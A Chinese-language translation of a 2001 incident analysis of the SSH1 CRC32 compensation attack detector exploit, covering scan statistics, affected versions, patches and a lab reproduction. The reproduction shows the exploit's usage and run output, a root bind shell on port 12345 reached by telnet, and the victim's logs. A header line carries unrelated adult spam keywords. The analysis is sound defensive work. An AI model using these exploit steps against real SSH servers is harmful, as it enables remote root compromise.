亚洲午夜成人片在线,亚洲中文字幕无码中文

<sup id="ii8ii"></sup>

<noscript id="ii8ii"></noscript>

<tfoot id="ii8ii"><noscript id="ii8ii"></noscript></tfoot>

明輝手游網(wǎng)中心：是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)！

文章發(fā)布全站軟件文章熱門搜索：QQ消息變小顯示關(guān)機(jī) 定時(shí) 體驗(yàn) 資訊首頁(yè)騰訊視頻愛(ài)奇藝暴風(fēng)影音酷狗音樂(lè) 酷我音樂(lè)影音大全軟件下載軟件教程電腦系統(tǒng)下載聊天工具辦公軟件殺毒教程系統(tǒng)工具圖形圖像電腦學(xué)習(xí)應(yīng)用軟件網(wǎng)絡(luò)軟件蘋(píng)果應(yīng)用注冊(cè)碼網(wǎng)站教程技術(shù)開(kāi)發(fā)安卓教程其它教程您當(dāng)前所在位置：網(wǎng)視手游站 -> 網(wǎng)站教程 -> 對(duì)于SSH crc32 compensation attack detector exploit 的區(qū)分
對(duì)于SSH crc32 compensation attack detector exploit 的區(qū)分發(fā)表時(shí)間：2024-01-18 來(lái)源：明輝站整理相關(guān)軟件相關(guān)文章人氣： [摘要]由于SSH crc32 compensation attack detector exploit代碼的流傳開(kāi)來(lái)，對(duì)于 SSH的掃描也越來(lái)越多，這是一份統(tǒng)計(jì)報(bào)表： +------------+------------+----------+----------+-----------+ date... 由于SSH crc32 compensation attack detector exploit代碼的流傳開(kāi)來(lái)，對(duì)于 SSH的掃描也越來(lái)越多，這是一份統(tǒng)計(jì)報(bào)表： +------------+------------+----------+----------+-----------+ date　　　 #Probes　　 #Sources #Targets #Scanners +------------+------------+----------+----------+-----------+ 2001-10-03 　　　 1466 　　45　　　　　987 　　　　　 2001-10-04 　　　　319 　　25　　　　　212 　　　　　 2001-10-05 　　　　825 　　22　　　　　783 　　　　　 2001-10-06 　　　86552 　　27　　　　86305 　　　　　　　　 2001-10-07 　　　 7564 　　29　　　　 7429 　　　　　 2001-10-08 　　　 2506 　　29　　　　 2449 　　　　　 2001-10-09 　　　 1010 　　18　　　　　263 　　　　　 2001-10-10 　　　　480 　　39　　　　　307 　　　　　 2001-10-11 　　　　978 　　31　　　　　504 　　　　　 2001-10-12 　　　　436 　　21　　　　　311 　　　　　 2001-10-13 　　　 6731 　　27　　　　 6353 　　　　　 2001-10-14 　　　 1411 　　29　　　　 1084 　　　　　 2001-10-15 　　　　936 　　34　　　　　723 　　　　　 2001-10-16 　　　 1358 　　40　　　　 1256 　　　　　 2001-10-17 　　　 1098 　　36　　　　　899 　　　　　 2001-10-18 　　　 1779 　　31　　　　 1438 　　　　　 2001-10-19 　　　19722 　　28　　　　19573 　　 7　　 2001-10-20 　　　25539 　　21　　　　25419 　　 3　　 2001-10-21 　　　 6796 　　26　　　　 6750 　　 9　　 2001-10-22 　　　　807 　　30　　　　　482 　　 5　　 2001-10-23 　　　　578 　　49　　　　　327 　　 6　　 2001-10-24 　　　 2198 　　39　　　　 2025 　　 9　　 2001-10-25 　　　 2368 　　31　　　　 1759 　　 6　　 2001-10-26 　　　　712 　　37　　　　　591 　　 7　　 2001-10-27 　　　　463 　　30　　　　　297 　　 8　　 2001-10-28 　　　　495 　　30　　　　　263 　　 5　　 2001-10-29 　　　　478 　　37　　　　　399 　　 5　　 2001-10-30 　　　 1154 　　48　　　　 1051 　　 5　　 2001-10-31 　　　 1998 　　46　　　　 1047 　　 5　　 2001-11-01 　　　66660 　　46　　　　66386 　　 5　　 2001-11-02 　　　 1514 　　40　　　　　926 　　 5　　 2001-11-03 　　　 2142 　　36　　　　 2047 　　 8　　 2001-11-04 　　　 1233 　　26　　　　　781 　　 9　　 +------------+------------+----------+----------+-----------+ 鑒于此情況，編譯整理David A. Dittrich <dittrich@cac.washington.edu> 文章(http://staff.washington.edu/dittrich/misc/ssh-analysis.txt)供大家參考和修補(bǔ)。 ------------------------------------------------------------------------------- 概述 ================== 此漏洞最開(kāi)始由CORE-SDI組織在securityfocus.com上的BUGTRAQ上發(fā)布了他們安全公告CORE-20010207，日期為2001,2月8號(hào)： http://www.securityfocus.com/advisories/3088 漏洞的簡(jiǎn)單描述就是：ssh1守護(hù)程序中所帶的一段代碼中存在一個(gè)整數(shù)溢出問(wèn)題。問(wèn)題出在 deattack.c,此程序由CORE SDI開(kāi)發(fā)，用來(lái)防止SSH1協(xié)議受到CRC32補(bǔ)償攻擊。由于在detect_attack()函數(shù)中錯(cuò)誤的將一個(gè)16位的無(wú)符號(hào)變量當(dāng)成了32位變量來(lái)使用，導(dǎo)致表索引溢出問(wèn)題。這將允許一個(gè)攻擊者覆蓋內(nèi)存中的任意位置的內(nèi)容，攻擊者可能遠(yuǎn)程獲取root權(quán)限。其他組織也陸續(xù)公布了一些對(duì)這個(gè)SSH 漏洞的分析和建議如：　　　 http://xforce.iss.net/alerts/advise100.php 　　　 http://razor.bindview.com/publish/advisories/adv_ssh1crc.html 　　　 http://www.securityfocus.com/bugid=2347 而在2001年10月21號(hào)Jay Dyson在incidents@securityfocus.com郵件列表上聲明有不少信息顯示有人在掃描RIPE 網(wǎng)絡(luò)段的SSH服務(wù)器：　　　 http://www.securityfocus.com/cgi-bin/archive.pl?id=75&start=2001-10-27&end=2001-11-02&mid=221998&threads=1 然后更甚的是在vuln-dev@securityfocus.com郵件列表中提示Newsbytes.com中有新聞描述有人愿付$1000美金的人提供此攻擊工具。還有沒(méi)有確認(rèn)的傳聞針對(duì) Solaris 8/SPARC SSH.com 1.2.26-31 系統(tǒng)的攻擊代碼也存在。著名的安全站點(diǎn) securitynewsportal.com就被這個(gè)漏洞攻擊，下面地址是被黑截圖：　　　 http://defaced.alldas.de/mirror/2001/10/24/www.securitynewsportal.com/ 最近TESO發(fā)布了關(guān)于這些攻擊代碼的信息，你可以在下面的地址查看：　　　 http://www.team-teso.org/sshd_statement.php 下面是受影響的SSH版本： SSH Communications Security SSH 2.x and 3.x (if SSH Version 1 fallback is enabled) SSH Communications Security SSH 1.2.23-1.2.31 F-Secure SSH versions prior to 1.3.11-2 OpenSSH versions prior to 2.3.0 (if SSH Version 1 fallback is enabled) OSSH 1.5.7 不過(guò)供應(yīng)商已經(jīng)為系統(tǒng)提供補(bǔ)丁信息，大家可以參考如下地址：　　　 http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm 　　　 http://openssh.org/security.html 　　　 http://www.cisco.com/warp/public/707/SSH-multiple-pub.html --------------------------------------------------------------------------- 攻擊行為的分析 ===================== 2001年10月6日，攻擊者從Netherlands網(wǎng)絡(luò)段使用crc32 compensation attack detector漏洞攻擊程序入侵了一臺(tái)UW網(wǎng)絡(luò)中使用了OpenSSH 2.1.1的Redhat linux 系統(tǒng)，漏洞描述如CERT VU#945216所述: 　　　 http://www.kb.cert.org/vuls/id/945216 系統(tǒng)中一系列操作系統(tǒng)命令被替換成木馬程序以提供以后再次進(jìn)入并清除了所有日志系統(tǒng)。第二臺(tái)SSH服務(wù)器運(yùn)行在39999/tcp高端口，系統(tǒng)入侵后被用來(lái)掃描其他 UW以外的網(wǎng)絡(luò)以獲得更多的運(yùn)行OpenSSH 2.1.1的系統(tǒng)。通過(guò)一些恢復(fù)操作對(duì)這個(gè)漏洞程序進(jìn)行了分析：這個(gè)攻擊代碼基于OpenSSH 2.2.0版本(這個(gè)是2.1.1之后的版本，對(duì)crc32 compensation attack detection function進(jìn)行了修補(bǔ))，不過(guò)針對(duì)OpenSSH 2.1.1進(jìn)行攻擊，其攻擊代碼也可以使用在ssh.com 1.2.31版本(針對(duì)其他SSH 協(xié)議1 和版本的測(cè)試尚無(wú)完成)。攻擊代碼對(duì)針對(duì)如下系統(tǒng)：　　　 linux/x86 ssh.com 1.2.26-1.2.31 rhl 　　　 linux/x86 openssh 1.2.3 (maybe others) 　　　 linux/x86 openssh 2.2.0p1 (maybe others) 　　　 freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl 雖然這個(gè)攻擊代碼可以對(duì)多個(gè)平臺(tái)系統(tǒng)進(jìn)行攻擊，這里攻擊者只掃描22/tcp端口，然后連接這些系統(tǒng)獲得響應(yīng)的版本程序并只對(duì)"OpenSSH_2.1.1"繼續(xù)進(jìn)一步操作。這些掃描使用快速SYN掃描，使用來(lái)自t0rn root kit中的工具。對(duì)破壞的系統(tǒng)進(jìn)行分析發(fā)現(xiàn)已經(jīng)有47067個(gè)地址被掃描，而在這些地址中，有1244 個(gè)主機(jī)被鑒別存在此漏洞，攻擊者成功的在8月8日系統(tǒng)離線之前利用此漏洞進(jìn)入 4個(gè)主機(jī)。這個(gè)攻擊者代碼對(duì)使用訪問(wèn)控制限制(如, SSH.com的"AllowHosts" 或者 "DenyHosts" 設(shè)置) 或者包過(guò)濾(如, ipchains, iptables, ipf) 的系統(tǒng)不能正常工作，因?yàn)檫@些會(huì)要求交換Public keys。 ------------------------------------------------------------------------- 對(duì)攻擊者代碼實(shí)時(shí)的分析 ============================ 此攻擊代碼在隔離的網(wǎng)絡(luò)段進(jìn)行測(cè)試，使用了網(wǎng)絡(luò)地址為10.10.10.0/24，攻擊主機(jī)使用了10.10.10.10 而有漏洞的服務(wù)主機(jī)為 10.10.10.3。有漏洞的服務(wù)主機(jī)系統(tǒng)運(yùn)行了在Red Hat Linux6.0(Kernel 2.2.16-3 on an i586) 的SSH.com的 1.2.31 版本。而攻擊主機(jī)運(yùn)行了Fred Cohen's PLAC[1] (從CD-ROM引導(dǎo)的Linux 2.4.5 系統(tǒng)), 文件使用"nc"(Netcat)[2]拷貝到系統(tǒng)中. 攻擊一方再現(xiàn) ========================= 當(dāng)以沒(méi)有任何參數(shù)運(yùn)行攻擊代碼的時(shí)候會(huì)顯示使用信息： =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= root@plac /bin >> ./ssh linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from openssh 2.2.0 src greets: mray, random, big t, sh1fty, scut, dvorak ps. this sploit already owned cia.gov :/ please pick a type Usage: ./ssh host [options] Options: -p port -b base Base address to start bruteforcing distance, by default 0x1800, goes as high as 0x10000 -t type -d debug mode -o Add this to delta_min types: 0: linux/x86 ssh.com 1.2.26-1.2.31 rhl 1: linux/x86 openssh 1.2.3 (maybe others) 2: linux/x86 openssh 2.2.0p1 (maybe others) 3: freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 被測(cè)試系統(tǒng)在系統(tǒng)端口2222上運(yùn)行著SSH.com version 1.2.31 (未修補(bǔ))程序，并把syslog日志重定向獨(dú)立的文件sshdx.log. 這里選擇了類型type 0和2222 攻擊端口： =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= root@plac /bin >> ./ssh 10.10.10.3 -p 2222 -t 0 linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from openssh 2.2.0 src greets: mray, random, big t, sh1fty, scut, dvorak ps. this sploit already owned cia.gov :/ ........................... bruteforced distance: 0x3200 bruteforcing distance from h->partial packet buffer on stack ..............^[[A................ ////////\\\\! bruteforced h->ident buff distance: 5bfbed88 trying retloc_delta: 35 ....! found high words of possible return address: 808 trying to exploit .... trying retloc_delta: 37 .! found high words of possible return address: 805 trying to exploit .... trying retloc_delta: 39 ...... trying retloc_delta: 3b ...... trying retloc_delta: 3d ! found high words of possible return address: 804 trying to exploit .... trying retloc_delta: 3f ...... =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 這里看來(lái)，攻擊攻擊相似被"停止"了，返回被攻擊系統(tǒng)查看卻發(fā)現(xiàn)被開(kāi)了后門。被測(cè)試系統(tǒng)一方再現(xiàn) ======================= 在利用漏洞之前，被測(cè)試系統(tǒng)顯示標(biāo)準(zhǔn)SSH守護(hù)程序運(yùn)行在22/tcp端口，要被測(cè)試的應(yīng)用程序運(yùn)行在2222/tcp端口，兩個(gè)都在監(jiān)聽(tīng)狀態(tài)，而且標(biāo)準(zhǔn)SSH守護(hù) 程序有一個(gè)外部連接(10.10.10.2:33354)，通過(guò)netstat查看如下： =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [root@victim /root]# netstat -an --inet Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN raw 0 0 0.0.0.0:1 0.0.0.0:* 7 raw 0 0 0.0.0.0:6 0.0.0.0:* 7 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 而在攻擊程序"停止"以后，再用netstat查看網(wǎng)絡(luò)監(jiān)聽(tīng)狀態(tài)如下： =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [root@victim /root]# netstat -an --inet Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN tcp 0 0 10.10.10.3:2222 10.10.10.10:32965 ESTABLISHED tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN raw 0 0 0.0.0.0:1 0.0.0.0:* 7 raw 0 0 0.0.0.0:6 0.0.0.0:* 7 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 發(fā)現(xiàn)有新的服務(wù)在12345/tcp端口監(jiān)聽(tīng)。返回攻擊者主機(jī)，使用netstat查看網(wǎng)絡(luò)狀態(tài)，發(fā)現(xiàn)程序使用了暴力猜測(cè)地址方式攻擊： =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [root@victim /root]# netstat -an --inet Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED tcp 0 0 10.10.10.3:2222 10.10.10.10:33075 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33074 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33072 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33071 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33069 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33067 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33066 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33064 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33063 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33062 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33061 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33060 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33059 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33058 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33056 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33055 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33053 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33051 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33050 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33048 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33047 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33046 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33042 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33041 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33040 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33039 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33038 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33036 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33035 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33034 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33033 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33032 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33030 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33029 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33028 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33027 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33024 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33023 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33022 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33021 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33020 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33016 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33014 TIME_WAIT tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN raw 0 0 0.0.0.0:1 0.0.0.0:* 7 raw 0 0 0.0.0.0:6 0.0.0.0:* 7 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 而使用LiSt Open Files ("lsof")[4]工具顯示被測(cè)試的SSH守護(hù)程序開(kāi)啟了一個(gè) 新的監(jiān)聽(tīng)端口： =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [root@victim /root]# lsof -p 9364 COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME sshd 9364 root cwd DIR 3,3 1024 2 / sshd 9364 root rtd DIR 3,3 1024 2 / sshd 9364 root txt REG 3,3 655038 442413 /usr/local/src/ssh-1.2.31/sbin/sshd1 sshd 9364 root mem REG 3,3 340771 30722 /lib/ld-2.1.3.so sshd 9364 root mem REG 3,3 370141 31107 /lib/libnsl-2.1.3.so sshd 9364 root mem REG 3,3 66231 31103 /lib/libcrypt-2.1.3.so sshd 9364 root mem REG 3,3 47008 31113 /lib/libutil-2.1.3.so sshd 9364 root mem REG 3,3 4101836 31102 /lib/libc-2.1.3.so sshd 9364 root mem REG 3,3 246652 31109 /lib/libnss_files-2.1.3.so sshd 9364 root mem REG 3,3 252234 31111 /lib/libnss_nisplus-2.1.3.so sshd 9364 root mem REG 3,3 255963 31110 /lib/libnss_nis-2.1.3.so sshd 9364 root mem REG 3,3 67580 31108 /lib/libnss_dns-2.1.3.so sshd 9364 root mem REG 3,3 169720 31112 /lib/libresolv-2.1.3.so sshd 9364 root 0u CHR 1,3 4110 /dev/null sshd 9364 root 1u CHR 1,3 4110 /dev/null sshd 9364 root 2u CHR 1,3 4110 /dev/null sshd 9364 root 3u inet 10202 TCP :12345 (LISTEN) sshd 9364 root 4u inet 10197 TCP 10.10.10.3:2222->10.10.10.10:33190 (CLOSE_WAIT) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 很明顯，攻擊程序成功利用此漏洞獲得ROOT SHELL，并綁定了一個(gè)高端TCP端口。這樣攻擊者可以使用任何"telnet"或者"rc"工具連接到此端口并以超級(jí)用戶的方式執(zhí)行任意命令，如下所示： =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= root@plac ~ >> telnet 10.10.10.3 12345 Trying 10.10.10.3... Connected to 10.10.10.3. Escape character is '^]'. id; uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) date; Thu Nov 1 18:04:42 PST 2001 netstat -an --inet; Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 10.10.10.3:12345 10.10.10.10:33077 ESTABLISHED tcp 0 0 0.0.0.0:12345 0.0.0.0: LISTEN tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN raw 0 0 0.0.0.0:1 0.0.0.0:* 7 raw 0 0 0.0.0.0:6 0.0.0.0:* 7 exit; Connection closed by foreign host. root@plac ~ >> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [注意]：使用telnet要加";"號(hào)，而nc連接不需要。等攻擊者退出以后，被測(cè)試系統(tǒng)網(wǎng)絡(luò)狀態(tài)返回正常： =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [root@victim /root]# netstat -an --inet Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN raw 0 0 0.0.0.0:1 0.0.0.0:* 7 raw 0 0 0.0.0.0:6 0.0.0.0:* 7 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 如果syslog日志功能開(kāi)啟了，連接和暴力測(cè)試的信息全部會(huì)記錄下來(lái)(注意，這個(gè)是對(duì)SSH.com 1.2.31在Red Hat LInux 6.0上的測(cè)試 -- 日志標(biāo)志會(huì)和記錄OpenSSH 不一樣)： =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Nov 1 18:46:14 victim sshd[9510]: log: Connection from 10.10.10.10 port 33298 Nov 1 18:46:19 victim sshd[9511]: log: Connection from 10.10.10.10 port 33299 Nov 1 18:46:22 victim sshd[9512]: log: Connection from 10.10.10.10 port 33300 Nov 1 18:46:26 victim sshd[9513]: log: Connection from 10.10.10.10 port 33301 Nov 1 18:46:31 victim sshd[9515]: log: Connection from 10.10.10.10 port 33302 Nov 1 18:46:35 victim sshd[9516]: log: Connection from 10.10.10.10 port 33303 Nov 1 18:46:39 victim sshd[9517]: log: Connection from 10.10.10.10 port 33304 Nov 1 18:46:43 victim sshd[9518]: log: Connection from 10.10.10.10 port 33305 Nov 1 18:46:47 victim sshd[9518]: fatal: Local: Corrupted check bytes on input. Nov 1 18:46:47 victim sshd[9519]: log: Connection from 10.10.10.10 port 33306 Nov 1 18:46:52 victim sshd[9519]: fatal: Connection closed by remote host. Nov 1 18:46:53 victim sshd[9520]: log: Connection from 10.10.10.10 port 33307 Nov 1 18:46:57 victim sshd[9521]: log: Connection from 10.10.10.10 port 33308 Nov 1 18:47:01 victim sshd[9522]: log: Connection from 10.10.10.10 port 33309 Nov 1 18:47:06 victim sshd[9523]: log: Connection from 10.10.10.10 port 33310 Nov 1 18:47:10 victim sshd[9524]: log: Connection from 10.10.10.10 port 33311 Nov 1 18:47:14 victim sshd[9525]: log: Connection from 10.10.10.10 port 33312 Nov 1 18:47:19 victim sshd[9526]: log: Connection from 10.10.10.10 port 33313 Nov 1 18:47:24 victim sshd[9527]: log: Connection from 10.10.10.10 port 33314 Nov 1 18:47:24 victim sshd[9527]: fatal: Connection closed by remote host. Nov 1 18:47:46 victim sshd[9528]: log: Connection from 10.10.10.10 port 33315 Nov 1 18:47:46 victim sshd[9529]: log: Connection from 10.10.10.10 port 33316 Nov 1 18:47:47 victim sshd[9530]: log: Connection from 10.10.10.10 port 33317 Nov 1 18:47:47 victim sshd[9531]: log: Connection from 10.10.10.10 port 33318 Nov 1 18:47:47 victim sshd[9532]: log: Connection from 10.10.10.10 port 33319 Nov 1 18:47:48 victim sshd[9533]: log: Connection from 10.10.10.10 port 33320 Nov 1 18:47:48 victim sshd[9534]: log: Connection from 10.10.10.10 port 33321 Nov 1 18:47:48 victim sshd[9535]: log: Connection from 10.10.10.10 port 33322 Nov 1 18:47:49 victim sshd[9536]: log: Connection from 10.10.10.10 port 33323 Nov 1 18:47:49 victim sshd[9537]: log: Connection from 10.10.10.10 port 33324 Nov 1 18:47:50 victim sshd[9538]: log: Connection from 10.10.10.10 port 33325 Nov 1 18:47:50 victim sshd[9539]: log: Connection from 10.10.10.10 port 33326 Nov 1 18:47:50 victim sshd[9540]: log: Connection from 10.10.10.10 port 33327 Nov 1 18:47:51 victim sshd[9541]: log: Connection from 10.10.10.10 port 33328 Nov 1 18:47:51 victim sshd[9542]: log: Connection from 10.10.10.10 port 33329 Nov 1 18:47:51 victim sshd[9543]: log: Connection from 10.10.10.10 port 33330 Nov 1 18:47:52 victim sshd[9544]: log: Connection from 10.10.10.10 port 33331 Nov 1 18:47:52 victim sshd[9545]: log: Connection from 10.10.10.10 port 33332 Nov 1 18:47:52 victim sshd[9546]: log: Connection from 10.10.10.10 port 33333 Nov 1 18:47:53 victim sshd[9547]: log: Connection from 10.10.10.10 port 33334 Nov 1 18:47:53 victim sshd[9548]: log: Connection from 10.10.10.10 port 33335 Nov 1 18:47:54 victim sshd[9549]: log: Connection from 10.10.10.10 port 33336 Nov 1 18:47:54 victim sshd[9550]: log: Connection from 10.10.10.10 port 33337 Nov 1 18:47:54 victim sshd[9551]: log: Connection from 10.10.10.10 port 33338 Nov 1 18:47:55 victim sshd[9552]: log: Connection from 10.10.10.10 port 33339 Nov 1 18:47:55 victim sshd[9553]: log: Connection from 10.10.10.10 port 33340 Nov 1 18:47:55 victim sshd[9554]: log: Connection from 10.10.10.10 port 33341 Nov 1 18:47:56 victim sshd[9555]: log: Connection from 10.10.10.10 port 33342 Nov 1 18:47:56 victim sshd[9556]: log: Connection from 10.10.10.10 port 33343 Nov 1 18:47:56 victim sshd[9555]: fatal: Local: Corrupted check bytes on input. Nov 1 18:47:57 victim sshd[9557]: log: Connection from 10.10.10.10 port 33344 Nov 1 18:47:57 victim sshd[9558]: log: Connection from 10.10.10.10 port 33345 Nov 1 18:47:57 victim sshd[9559]: log: Connection from 10.10.10.10 port 33346 Nov 1 18:47:58 victim sshd[9560]: log: Connection from 10.10.10.10 port 33347 Nov 1 18:47:58 victim sshd[9561]: log: Connection from 10.10.10.10 port 33348 Nov 1 18:47:59 victim sshd[9562]: log: Connection from 10.10.10.10 port 33349 Nov 1 18:47:59 victim sshd[9563]: log: Connection from 10.10.10.10 port 33350 Nov 1 18:47:59 victim sshd[9564]: log: Connection from 10.10.10.10 port 33351 Nov 1 18:48:00 victim sshd[9565]: log: Connection from 10.10.10.10 port 33352 Nov 1 18:48:00 victim sshd[9566]: log: Connection from 10.10.10.10 port 33353 Nov 1 18:48:00 victim sshd[9567]: log: Connection from 10.10.10.10 port 33354 Nov 1 18:48:01 victim sshd[9568]: log: Connection from 10.10.10.10 port 33355 Nov 1 18:48:01 victim sshd[9569]: log: Connection from 10.10.10.10 port 33356 Nov 1 18:48:02 victim sshd[9570]: log: Connection from 10.10.10.10 port 33357 Nov 1 18:48:02 victim sshd[9571]: log: Connection from 10.10.10.10 port 33358 Nov 1 18:48:02 victim sshd[9572]: log: Connection from 10.10.10.10 port 33359 Nov 1 18:48:03 victim sshd[9573]: log: Connection from 10.10.10.10 port 33360 Nov 1 18:48:03 victim sshd[9574]: log: Connection from 10.10.10.10 port 33361 Nov 1 18:48:03 victim sshd[9575]: log: Connection from 10.10.10.10 port 33362 Nov 1 18:48:04 victim sshd[9576]: log: Connection from 10.10.10.10 port 33363 Nov 1 18:48:04 victim sshd[9577]: log: Connection from 10.10.10.10 port 33364 Nov 1 18:48:04 victim sshd[9578]: log: Connection from 10.10.10.10 port 33365 Nov 1 18:48:05 victim sshd[9579]: log: Connection from 10.10.10.10 port 33366 Nov 1 18:48:05 victim sshd[9580]: log: Connection from 10.10.10.10 port 33367 Nov 1 18:48:06 victim sshd[9581]: log: Connection from 10.10.10.10 port 33368 Nov 1 18:48:06 victim sshd[9582]: log: Connection from 10.10.10.10 port 33369 Nov 1 18:48:06 victim sshd[9583]: log: Connection from 10.10.10.10 port 33370 Nov 1 18:48:07 victim sshd[9584]: log: Connection from 10.10.10.10 port 33371 Nov 1 18:48:07 victim sshd[9585]: log: Connection from 10.10.10.10 port 33372 Nov 1 18:48:07 victim sshd[9586]: log: Connection from 10.10.10.10 port 33373 Nov 1 18:48:08 victim sshd[9587]: log: Connection from 10.10.10.10 port 33374 Nov 1 18:48:08 victim sshd[9586]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 